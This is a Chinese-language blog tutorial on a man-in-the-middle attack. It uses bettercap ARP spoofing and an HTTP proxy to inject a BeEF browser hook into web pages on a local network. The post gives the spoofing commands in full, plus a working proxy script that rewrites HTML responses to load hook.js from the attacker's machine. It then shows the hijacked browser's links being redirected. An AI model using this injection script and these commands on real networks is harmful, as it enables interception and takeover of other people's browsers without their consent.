beef的简单使用–结合中间人攻击注入钩子
程序员文章站
2022-03-09 22:52:21
...
最近接触到了beef这款工具,看过基本教程后就自己进行了一次攻击尝试。
总体思路就是在内网下通过arp欺骗,修改response包,加入我们的钩子,十分简单。
首先是arp欺骗,这里用的是bettercap,可以参考我之前的文章。
开始arp欺骗:arp.spoof on
打开http代理:http.proxy on
下面我们要写一个js文件用于处理返回的response包,保存为in.js:
参考:https://github.com/bettercap/bettercap/wiki/http.modules
function onResponse(req, res) {
if( res.ContentType.indexOf('text/html') == 0 ){
var body = res.ReadBody();
if( body.indexOf('</head>') != -1 ) {
res.Body = body.replace(
'</head>',
'<script src="http://192.168.1.112:3000/hook.js">'+
'</script>' +
'</head>'
);
}
}
}
这段代码就是在返回的html中的head部分加入
<script src=”http://192.168.1.112:3000/hook.js”>,
192.168.1.112是kali的内网地址
然后执行 set http.proxy.script /usr/in.js(js文件的位置)
现在在受害主机上打开一个http的网址即可,这里我用的是自己小网站
打开之后查看源码,可以看到已经成功注入:
再看beef这里的清况:
可以看到受害主机浏览器已被控制,
然后进行一个小操作吧,把受害主机当前页面的所有连接都改到百度:
这时在页面上点任何一个链接都会跳转到百度:
一个beef的教程:http://www.freebuf.com/articles/web/175755.html
文章同步到我的博客:http://www.zjzhhb.com/archives/498
转载联系我